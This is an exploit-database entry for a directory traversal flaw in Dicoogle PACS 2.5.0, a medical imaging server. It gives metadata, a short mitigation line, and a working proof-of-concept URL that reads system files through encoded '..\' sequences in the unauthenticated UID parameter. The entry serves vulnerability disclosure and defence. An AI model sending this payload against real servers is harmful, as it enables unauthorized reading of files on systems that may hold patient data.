Dicoogle PACS 2.5.0 - Directory Traversal

vendor:

Dicoogle PACS

by:

Carlos Avila

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: Dicoogle PACS

Affected Version From: Dicoogle PACS 2.5.0

Affected Version To: Dicoogle PACS 2.5.0

Patch Exists: NO

Related CWE:

CPE: a:dicoogle:dicoogle_pacs:2.5.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 2012 R2

2018

Dicoogle PACS 2.5.0 – Directory Traversal

Dicoogle PACS 2.5.0 is vulnerable to local file inclusion, allowing an attacker to read arbitrary files that the web user has access to. Admin credentials are not required. The 'UID' parameter via GET is vulnerable.

Mitigation:

Update to a patched version of Dicoogle PACS or apply appropriate security measures to prevent directory traversal attacks.

Source

Exploit-DB raw data:

# Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal
# Date: 2018-05-25
# Software Link: http://www.dicoogle.com/home
# Version: Dicoogle PACS 2.5.0-20171229_1522
# Category: webapps
# Tested on: Windows 2012 R2
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt

# 1. Description
# Dicoogle is an open source medical imaging repository with an extensible
# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable
# to local file inclusion. This allows an attacker to read arbitrary files that the
# web user has access to. Admin credentials aren't required. The ‘UID’ parameter
# via GET is vulnerable.

# 2. Proof of Concept

http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini